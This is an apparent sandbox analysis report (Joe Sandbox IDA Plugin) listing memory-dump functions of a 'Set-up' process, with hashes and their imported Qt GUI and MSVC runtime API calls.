Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: AtomicAttribute@BasicData@@Int@@ListWidget@@$?begin@?deref@?end@?ref@?set?viewport@AbstractArea@@Free@@Qt@@_ScrollWidget
String ID:
API String ID: 3744203714-0
Opcode ID: bc23917485ee39489c1dd09ccc9a14ca38ef4e259220964a120c37e9d0d85165
Instruction ID: 7421c6a3462e5a92248831469d157901e927fffa0c8c49c1885be978fc342220
Opcode Fuzzy Hash: bc23917485ee39489c1dd09ccc9a14ca38ef4e259220964a120c37e9d0d85165
Instruction Fuzzy Hash: 75116DB1A083429FDB04DF28C455B5E77E8FB85728F148E2DE4A697681E738E504CB92

Function 6BC293B0 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000004,B6508C7A,0000014C,0000014C,?,6C15BE6B,000000FF,6BC294C0,B6508C7A,0000014C,?,?,B6508C7A,?,00000000), ref: 6BC293ED
??0QMutex@@QAE@W4RecursionMode@0@@Z.QTCORE4(00000000), ref: 6BC29409

Part of subcall function 6C148072: __onexit.MSVCRT ref: 6C14807A

??1QMutex@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BC29434
??3@YAXPAX@Z.MSVCR100(00000000), ref: 6BC2943B

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Mutex@@$??2@??3@Mode@0@@Recursion__onexit
String ID:
API String ID: 3771536828-0
Opcode ID: 45dc3d604930247a082d821f8d71180cb80f400ecc052f43c7b614af575392f4
Instruction ID: fe9788066c00e7dd195121552da9aa5b3471ea3cf5f7344799b321d5af5c64c6
Opcode Fuzzy Hash: 45dc3d604930247a082d821f8d71180cb80f400ecc052f43c7b614af575392f4
Instruction Fuzzy Hash: 59118BB57196119FEF00CF69980571A3AB8EB46B14F00893BE922C7781F7789B148B92

Function 6C0E0120 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?itemsBoundingRect@QGraphicsScene@@QBE?AVQRectF@@XZ.QTGUI4(?), ref: 6C0E015D
??_5QRectF@@QAEAAV0@ABV0@@Z.QTCORE4(00000000,?), ref: 6C0E0165
??9@YA_NABVQRectF@@0@Z.QTCORE4(000000FD,?), ref: 6C0E0178
?activate@QMetaObject@@SAXPAVQObject@@PBU1@HPAPAX@Z.QTCORE4 ref: 6C0E01A2

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Rect$Object@@$??9@??_5?activate@?itemsBoundingF@@0@GraphicsMetaRect@Scene@@V0@@
String ID:
API String ID: 2280983303-0
Opcode ID: 34461b712d90ce37a9c7ec25a4fd459bc1e4a43e8bd260fe0874b19ddb1a29e5
Instruction ID: 31b166d21c2f9e71489da7e27c32ded1522309e15de506616b1169884bd274fc
Opcode Fuzzy Hash: 34461b712d90ce37a9c7ec25a4fd459bc1e4a43e8bd260fe0874b19ddb1a29e5
Instruction Fuzzy Hash: 101194712043045FCB00CF18D48079BB7E9FF89318F048468FD5A9B242DB35A919DB61

Function 6BFB9400 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000054,B6508C7A,?,?,?,?,6C1AB184,000000FF,6BC13C57,00000000), ref: 6BFB9427
??0QObjectPrivate@@QAE@H@Z.QTCORE4(00040805,?,?,?,?,?,?,?,00000000), ref: 6BFB9448
??0QLocale@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,00000000), ref: 6BFB945C
??0QObject@@IAE@AAVQObjectPrivate@@PAV0@@Z.QTCORE4(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6BFB9483

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ObjectPrivate@@$??2@Locale@@Object@@V0@@
String ID:
API String ID: 645810006-0
Opcode ID: 11227671be9fa2825e0509d83d2ecafbd2836bb288237f133103c9149fbb4dd7
Instruction ID: 78f6bfbf93a72dafc8e7866ae1498ee022e3952dddf297f08e1031a7cc0e5f0e
Opcode Fuzzy Hash: 11227671be9fa2825e0509d83d2ecafbd2836bb288237f133103c9149fbb4dd7
Instruction Fuzzy Hash: 3911BEB6204B41DFD710CF54D449A5ABBF8FF4A714F008A1EE4A183790CB789954CBD2

Function 6C0CAD00 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

??0QObject@@QAE@PAV0@@Z.QTCORE4(00000000,B6508C7A), ref: 6C0CAD2D
??2@YAPAXI@Z.MSVCR100(?,?,?,?,?,?,?,?,?,?,000000FF,6BC12EB7,00000000), ref: 6C0CAD4D
??0QGraphicsItemPrivate@@QAE@XZ.QTGUI4(?,?,?,?,?,?,?,?,?,?,000000FF,6BC12EB7,00000000), ref: 6C0CAD64

Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DEFA
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF09
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF12
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF24
Part of subcall function 6BC1DEC0: ??0QPointF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF32
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF56
Part of subcall function 6BC1DEC0: ??0QTransform@@QAE@XZ.QTGUI4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF73
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFA0
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFD2

?setParentItem@QGraphicsItem@@QAEXPAV1@@Z.QTGUI4(?,?,?,?,?,?,?,?,?,?,?,000000FF,6BC12EB7,00000000), ref: 6C0CAD82

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ?ref@AtomicBasicInt@@$GraphicsRect$??2@?setItemItem@Item@@Object@@ParentPointPrivate@@Transform@@V0@@V1@@
String ID:
API String ID: 3759511039-0
Opcode ID: f390dcf5d9f2a8aea42b3953a5d41f7a5ce71d74191bbeeb72dea73ec83abc41
Instruction ID: 9278653c8584bf39fc18252edd6d151285f4550c5d4a14af0e4c9f8138b2a0d1
Opcode Fuzzy Hash: f390dcf5d9f2a8aea42b3953a5d41f7a5ce71d74191bbeeb72dea73ec83abc41
Instruction Fuzzy Hash: F7114FB16087418FD710DF19D805B4BBBE4FB99718F04492EE099D7791D7789508CB92

Function 6C0ED680 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000028,B6508C7A,?,?,?,?,6C1A7743,000000FF,6BC139D7,00000000), ref: 6C0ED6A7
??0QPointF@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,00000000), ref: 6C0ED6D3
??0QPoint@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,00000000), ref: 6C0ED6DC
??0QEvent@@QAE@W4Type@0@@Z.QTCORE4(?,?,?,?,?,?,?,?,00000000), ref: 6C0ED6F5

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ??2@Event@@PointPoint@@Type@0@@
String ID:
API String ID: 2663708956-0
Opcode ID: be7d99b441803571e0fda64631b3c3705ae4ca4db886c213aaf516a13a061840
Instruction ID: ece927afa336e6d6a3423cc92e6e01d880fe2833895efab7ecb3c688033f49f7
Opcode Fuzzy Hash: be7d99b441803571e0fda64631b3c3705ae4ca4db886c213aaf516a13a061840
Instruction Fuzzy Hash: 561191B56047519FC710CF68C44465AFBE8FF89720F108A2EE4A5C3790D774A505CB91

Function 6C0BA5A0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

?ensureSceneTransformRecursive@QGraphicsItemPrivate@@QAEXPAPAVQGraphicsItem@@@Z.QTGUI4(?,?,?), ref: 6C0BA5BB
?translated@QRectF@@QBE?AV1@NN@Z.QTCORE4(?), ref: 6C0BA5F4
?inverted@QTransform@@QBE?AV1@PA_N@Z.QTGUI4(00000000,00000000,?,?,?,?,?), ref: 6C0BA61B
?mapRect@QTransform@@QBE?AVQRectF@@ABV2@@Z.QTGUI4(00000000,00000000,?,?,?,?,?), ref: 6C0BA622

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: GraphicsRectTransform@@$?ensure?inverted@?map?translated@ItemItem@@@Private@@Rect@Recursive@SceneTransformV2@@
String ID:
API String ID: 1153697686-0
Opcode ID: 9538ff313b96d87be10681ca8560905ae67c9c68223cfe9ebd05d50810fb1ef0
Instruction ID: b966a86c111c65c018217c5b97f4a850d6019a6cd199d4a7da666fa489d8af8d
Opcode Fuzzy Hash: 9538ff313b96d87be10681ca8560905ae67c9c68223cfe9ebd05d50810fb1ef0
Instruction Fuzzy Hash: 43018C356047009BC218EB28C855ADBFBEAFFD4714F04481DE8D693350DB30A858CBD2

Function 6C12C5D0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000078,B6508C7A,?,?,?,?,6C1AB184,000000FF,6BC15247,00000000), ref: 6C12C5F7
??0QObjectPrivate@@QAE@H@Z.QTCORE4(00040805,?,?,?,?,?,?,?,00000000), ref: 6C12C618
??0QRectF@@QAE@XZ.QTCORE4 ref: 6C12C633
??0QObject@@IAE@AAVQObjectPrivate@@PAV0@@Z.QTCORE4(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6C12C651

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ObjectPrivate@@$??2@Object@@RectV0@@
String ID:
API String ID: 4272402653-0
Opcode ID: 2fd5508e08e63ec8e63460ea5520e9a15ab442d50676efa8dae4166174e73cfd
Instruction ID: 2fb8675d77b2fa94ea87aaefe601461582d0af05ef339efe3887fb92a0c1aa5e
Opcode Fuzzy Hash: 2fd5508e08e63ec8e63460ea5520e9a15ab442d50676efa8dae4166174e73cfd
Instruction Fuzzy Hash: DA1182B16047519FD310CF58C809B5BBBE4FF55714F004A1EE59193790DBB9D5098BE2

Function 6C12C0C0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

??0QObjectPrivate@@QAE@H@Z.QTCORE4(00040805,B6508C7A), ref: 6C12C0EF
??0QRectF@@QAE@XZ.QTCORE4 ref: 6C12C10D
??2@YAPAXI@Z.MSVCR100(00000008), ref: 6C12C12A
??0QPixmapColorizeFilter@@QAE@PAVQObject@@@Z.QTGUI4(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C12C143

Part of subcall function 6BCD1B80: ??2@YAPAXI@Z.MSVCR100(00000070,B6508C7A,?,00000000), ref: 6BCD1BBD
Part of subcall function 6BCD1B80: ??0QObjectPrivate@@QAE@H@Z.QTCORE4(00040805), ref: 6BCD1BDE
Part of subcall function 6BCD1B80: ?invalidate@QColor@@AAEXXZ.QTGUI4 ref: 6BCD1BF2
Part of subcall function 6BCD1B80: ??0QObject@@IAE@AAVQObjectPrivate@@PAV0@@Z.QTCORE4(00000000,?), ref: 6BCD1C07
Part of subcall function 6BCD1B80: ?setRgb@QColor@@QAEXHHHH@Z.QTGUI4(00000000,00000000,000000C0,000000FF), ref: 6BCD1C3A
Part of subcall function 6BCD1B80: ??4QColor@@QAEAAV0@ABV0@@Z.QTGUI4(?,00000000,00000000,000000C0,000000FF), ref: 6BCD1C47

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Color@@ObjectPrivate@@$??2@V0@@$?invalidate@?setColorizeFilter@@Object@@Object@@@PixmapRectRgb@
String ID:
API String ID: 3034395748-0
Opcode ID: cd6b1e26c7d5f545f946dcd02ba1a24c0811e3bfa8359d8a556e2145b1a62a24
Instruction ID: 6d86c090fdce7d9608a87f6247cb6b4123a696ef7d75acac9619bb3328ecf12a
Opcode Fuzzy Hash: cd6b1e26c7d5f545f946dcd02ba1a24c0811e3bfa8359d8a556e2145b1a62a24
Instruction Fuzzy Hash: 731127B5608741DFE720DF28C856746BBE4FB45714F00492EE596C2A90E779D1088BA2

Function 6BFB9050 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000050,B6508C7A,?,?,?,?,6C1AB184,000000FF,6BC13AB7,00000000), ref: 6BFB9077
??0QObjectPrivate@@QAE@H@Z.QTCORE4(00040805,?,?,?,?,?,?,?,00000000), ref: 6BFB9098
??0QLocale@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,00000000), ref: 6BFB90AC
??0QObject@@IAE@AAVQObjectPrivate@@PAV0@@Z.QTCORE4(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6BFB90C6

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ObjectPrivate@@$??2@Locale@@Object@@V0@@
String ID:
API String ID: 645810006-0
Opcode ID: 396e061167f72927e208c4642395e6d3c64e5f697ee8af82fe0d4718ee43e767
Instruction ID: d7e8658f93509140b8283b738d66161c7569fffe9eb18ec8121c843dc9751150
Opcode Fuzzy Hash: 396e061167f72927e208c4642395e6d3c64e5f697ee8af82fe0d4718ee43e767
Instruction Fuzzy Hash: 5E01C0B22047919FD710CF59C805B5BBBE8FF89724F004A1EE551C3790DB7899048BE2

Function 6C12CFA0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?offset@QPixmapDropShadowFilter@@QBE?AVQPointF@@XZ.QTGUI4(?,?,?,?,?,?,?,6BC1551A,00000000), ref: 6C12CFB8
?setOffset@QPixmapDropShadowFilter@@QAEXABVQPointF@@@Z.QTGUI4(?,?,?,?,?,6BC1551A,00000000), ref: 6C12CFCE
?remove@QPixmapCache@@SAXABVKey@1@@Z.QTGUI4(?), ref: 6C12CFF9
?offsetChanged@QGraphicsDropShadowEffect@@IAEXABVQPointF@@@Z.QTGUI4(?,?,?,?,?,?,6BC1551A,00000000), ref: 6C12D004

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: DropPixmapPointShadow$F@@@Filter@@$?offset?offset@?remove@?setCache@@Changed@Effect@@GraphicsKey@1@@Offset@
String ID:
API String ID: 3184050098-0
Opcode ID: 24ee7165d4509c46725e0107acf9c0397f64303e5d58593f703db8ceb4b4e651
Instruction ID: a61b97b41f9f3286febea4eb1d1f9c69660b7d19ac24f0367ee1e90445a0e8f1
Opcode Fuzzy Hash: 24ee7165d4509c46725e0107acf9c0397f64303e5d58593f703db8ceb4b4e651
Instruction Fuzzy Hash: FE01F2BA700600AFD700EBA9D881D57F3E9BF982083084858EA15C3722E736FC45C7A1

Function 6C0E6930 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000008,B6508C7A,?,?,?,00000000,6C1A324B,000000FF,6BC135BF,00000000), ref: 6C0E6957
??0QGraphicsLineItem@@QAE@ABVQLineF@@PAVQGraphicsItem@@PAVQGraphicsScene@@@Z.QTGUI4(?,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 6C0E6976

Part of subcall function 6C0CB5E0: ??2@YAPAXI@Z.MSVCR100(00000148,B6508C7A,?,00000000,?,?,?,?,00000000,6C1A526B,000000FF,6C0E697B,?,00000000,00000000,00000000), ref: 6C0CB611
Part of subcall function 6C0CB5E0: ??0QGraphicsItemPrivate@@QAE@XZ.QTGUI4 ref: 6C0CB62D
Part of subcall function 6C0CB5E0: ??0QLineF@@QAE@XZ.QTCORE4 ref: 6C0CB643
Part of subcall function 6C0CB5E0: ??0QPen@@QAE@XZ.QTGUI4 ref: 6C0CB64F
Part of subcall function 6C0CB5E0: ??0QGraphicsItem@@IAE@AAVQGraphicsItemPrivate@@PAV0@PAVQGraphicsScene@@@Z.QTGUI4(00000000,?,?), ref: 6C0CB66D
Part of subcall function 6C0CB5E0: ??8QLineF@@QBE_NABV0@@Z.QTCORE4(?,00000000,?,?), ref: 6C0CB690
Part of subcall function 6C0CB5E0: ?prepareGeometryChange@QGraphicsItem@@IAEXXZ.QTGUI4 ref: 6C0CB69C
Part of subcall function 6C0CB5E0: ??0QRectF@@QAE@XZ.QTCORE4 ref: 6C0CB6AC
Part of subcall function 6C0CB5E0: ?update@QGraphicsItem@@QAEXABVQRectF@@@Z.QTGUI4(00000000), ref: 6C0CB6B5

?setPen@QGraphicsLineItem@@QAEXABVQPen@@@Z.QTGUI4 ref: 6C0E698C
?addItem@QGraphicsScene@@QAEXPAVQGraphicsItem@@@Z.QTGUI4(00000000), ref: 6C0E6994

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Graphics$Item@@$Line$??2@ItemPrivate@@RectScene@@@$?add?prepare?set?update@Change@F@@@GeometryItem@Item@@@Pen@Pen@@Pen@@@Scene@@V0@@
String ID:
API String ID: 2433676259-0
Opcode ID: 55ebeb285b33dfe7f71cc9942bfc73502ab034bcf2a7e09441cda8217d7cba4d
Instruction ID: deed03ddfc52e427e938af1382974ccab5a49ad521e284d756f22b26fcbaf8d9
Opcode Fuzzy Hash: 55ebeb285b33dfe7f71cc9942bfc73502ab034bcf2a7e09441cda8217d7cba4d
Instruction Fuzzy Hash: 300167726046505FD214CF59C845B6FB7EDFB89A24F144A1EF065C3780EB74E90587E2

Function 6C12C1F0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

??0QObjectPrivate@@QAE@H@Z.QTCORE4(00040805,B6508C7A), ref: 6C12C21F
??0QRectF@@QAE@XZ.QTCORE4 ref: 6C12C23D
??2@YAPAXI@Z.MSVCR100(00000008), ref: 6C12C257
??0QPixmapBlurFilter@@QAE@PAVQObject@@@Z.QTGUI4(00000000,?,?,?,?,?,?,?,?,?,?,?,6BC153E7,00000000), ref: 6C12C270

Part of subcall function 6BCD1A50: ??2@YAPAXI@Z.MSVCR100(00000060,B6508C7A,?,00000000,00000000,00000000,6C1A324B,000000FF,6C12C275,00000000), ref: 6BCD1A77
Part of subcall function 6BCD1A50: ??0QObjectPrivate@@QAE@H@Z.QTCORE4(00040805,?,?,?,?,?,?,?,?,?,?,?,?,6BC153E7,00000000), ref: 6BCD1A98
Part of subcall function 6BCD1A50: ??0QObject@@IAE@AAVQObjectPrivate@@PAV0@@Z.QTCORE4(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6BC153E7,00000000), ref: 6BCD1AC8

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ObjectPrivate@@$??2@$BlurFilter@@Object@@Object@@@PixmapRectV0@@
String ID:
API String ID: 328261084-0
Opcode ID: faa3c4eff345d8560ab86270db1182a4c6e02ce51cd3bf14c1a689dc5bf94575
Instruction ID: fbf6622b1fab8c5675fae57526130aaf09c60de4741f197be4fa97fa065c815a
Opcode Fuzzy Hash: faa3c4eff345d8560ab86270db1182a4c6e02ce51cd3bf14c1a689dc5bf94575
Instruction Fuzzy Hash: 5A1169B56087419FE710DF68C94A70ABBE4FF49714F008D2EE596D2B90EB79D108CB92

Function 6C12C310 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

??0QObjectPrivate@@QAE@H@Z.QTCORE4(00040805,B6508C7A), ref: 6C12C33F
??0QRectF@@QAE@XZ.QTCORE4 ref: 6C12C35D
??2@YAPAXI@Z.MSVCR100(00000008), ref: 6C12C377
??0QPixmapDropShadowFilter@@QAE@PAVQObject@@@Z.QTGUI4(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C12C390

